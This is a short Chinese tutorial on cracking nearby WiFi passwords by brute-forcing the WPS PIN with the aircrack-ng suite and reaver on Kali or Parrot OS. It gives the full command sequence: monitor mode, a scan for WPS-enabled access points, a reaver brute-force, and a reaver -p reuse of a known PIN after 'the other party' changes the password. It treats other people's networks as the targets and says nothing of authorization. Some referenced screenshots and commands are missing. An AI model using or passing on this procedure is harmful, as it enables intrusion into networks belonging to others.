穷举PIN码破解Wifi
穷举pin破解wifi密码
参考网址:
http://code.google.com/p/reaver-wps/
http://zpblog.cn/linux/aireplay-ng-failed-Device-or-resource-busy.html
http://www.2cto.com/Article/201312/262608.html
http://blog.csdn.net/hope_smile/article/details/46234187
准备工具:
kali_Rolling,Parrot Security OS,8187L网卡,VMware
以下kali_Rolling为例
把8187L网卡插入电脑,虚拟机开启kali_Rolling
将8187L网卡连接到kali_Rolling,虚拟机——可移动设备——Realtek……——连接(断开……)
打开终端,输入“ifconfig”,列出自己的网卡设备,下图标注的wlan0就是8187L网卡,如果不知道自己的网卡对应的是哪个设备,看一下后面的HWaddr地址就可以了,一般是(wlan0,或者mon0)
接下来把网卡设置成监听模式,在终端输入“airmon-ng start wlan0”
将网卡放到一个信号强的位置,扫描附近wifi,在终端输入“airodump-ng wlan0mon –wps”
如果提示上图的错误,那么输入下面的4条命令
之后重新输入“airodump-ng wlan0mon –wps”,然后会自动扫描附近WiFi
看一下是否将附近wifi都扫描完毕,按“ctrl+c”,停止扫描,看MB一列是否后面有“.”,如 “54e.”,有的话就是说明可以进行pin码操作,如果没有就说明不可以
Pin码的命令为:reaver -i 网卡 -b MAC–vv
运气好的话,几分钟就出了密码,而运气差的话,基本N小时之后,WPS PIN是pin码,WPS PSK是密码
出来pin码和密码之后,在终端输入“airmon-ngstop wlan0mon”,关闭监听模式
如果对方改了密码但没改pin码的情况下使用如下命令:reaver -i 网卡 -b MAC-p PIN码 –vv
Parrot Security OS和kali_Rolling的操作基本是一样的
ifconfig
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng wlan0
ctrl+c
reaver -i 网卡 -b MAC–vv
reaver -i 网卡 -b MAC-p PIN码 –vv
airmon-ng stop wlan0